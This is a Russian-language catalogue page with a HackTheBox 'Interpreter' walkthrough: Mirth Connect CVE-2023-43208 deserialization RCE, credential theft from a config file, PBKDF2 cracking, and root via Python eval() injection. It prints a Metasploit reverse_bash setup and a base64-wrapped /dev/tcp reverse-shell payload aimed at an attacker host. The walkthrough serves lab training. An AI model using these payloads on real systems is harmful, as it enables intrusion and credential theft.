Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Interpreter-HackTheBox — Прохождение HackTheBox Interpreter: десериализационная RCE CVE-2023-43208 в Mirth Connect, взлом хешей PBKDF2 и повышение привилегий до root через инъекцию eval(). | Kitploit
Инструменты/GitHubGitHub/ledksv/interpreter-hackthebox
Взлом паролейПовышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияCTFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Обучение и Образование
GitHubledksv/interpreter-hackthebox

Interpreter-HackTheBox

Прохождение HackTheBox Interpreter: десериализационная RCE CVE-2023-43208 в Mirth Connect, взлом хешей PBKDF2 и повышение привилегий до root через инъекцию eval().

Репозиторий
3 месяцев назадЕщё не проверено

Interpreter — HackTheBox

Платформа: HackTheBox ОС: Linux Статус: Retired — полный walkthrough опубликован.

Полный walkthrough: l3dsec.com/walkthroughs/interpreter-htb


Цепочка атаки

root@kitploit:~
Nmap → Mirth Connect 4.4.0 (80/443)
  → CVE-2023-43208 неаутентифицированный RCE через Java-десериализацию
    → Shell от имени mirth
      → mirth.properties → учётные данные MySQL
        → MySQL → хеш PBKDF2 пользователя sedric → hashcat → SSH → USER FLAG
          → notif.py, запущенный от root на 127.0.0.1:54321
            → инъекция eval() через XML POST → ROOT SHELL → ROOT FLAG

1. Разведка

root@kitploit:~
nmap -sV -sC <TARGET_IP> -Pn
root@kitploit:~
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 (Debian)
80/tcp  open  http    Jetty (Mirth Connect)
443/tcp open  ssl     Jetty SSL (Mirth Connect)

Определение версии через REST API Mirth:

root@kitploit:~
curl -sk https://<TARGET_IP>/api/server/version -H "X-Requested-With: XMLHttpRequest"
# Returns: 4.4.0

2. Первоначальное закрепление — CVE-2023-43208

Mirth Connect 4.4.0 уязвим к неаутентифицированному RCE через Java-десериализацию:

root@kitploit:~
use exploit/multi/http/mirth_connect_cve_2023_43208
set RHOSTS <TARGET_IP>
set RPORT 443
set LHOST <ATTACKER_IP>
set FETCH_WRITABLE_DIR /tmp
set payload cmd/unix/reverse_bash
exploit

Shell от имени mirth.


3. Сбор учётных данных

root@kitploit:~
find / -name "mirth.properties" 2>/dev/null
# /usr/local/mirthconnect/conf/mirth.properties
# database.username = mirthdb
# database.password = <redacted>
# database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

mysql -u mirthdb -p'<db_password>' mc_bdd_prod

Перечисление MySQL выявляет пользователя sedric с хешем PBKDF2 и канал HL7, перенаправляющий XML на http://127.0.0.1:54321/addPatient.


4. User Flag — взлом хеша

root@kitploit:~
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

Хеш взломан. Подключаемся по SSH как sedric, читаем /home/sedric/user.txt.


5. Повышение привилегий — инъекция eval()

notif.py запущен от root и слушает 127.0.0.1:54321/addPatient — тот же эндпоинт, на который Mirth перенаправляет XML. Он передаёт поле XML firstname напрямую в Python-функцию eval().

Полезная нагрузка из shell mirth:

root@kitploit:~
import urllib.request, base64
from urllib.request import Request

cmd = "bash -i >& /dev/tcp/<ATTACKER_IP>/9004 0>&1"
b64 = base64.b64encode(cmd.encode()).decode()
inj = f"{{exec(__import__('base64').b64decode('{b64}').decode())}}"
xml = f"<patient><firstname>{inj}</firstname><lastname>x</lastname></patient>"

req = Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml.encode(),
    headers={"Content-Type": "application/xml"}
)
urllib.request.urlopen(req)

Root shell получен на слушателе.


Флаги

ФлагЗначение
Userredacted
Rootredacted

Только в образовательных целях. Тестируйте только те системы, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.

Скачать инструмент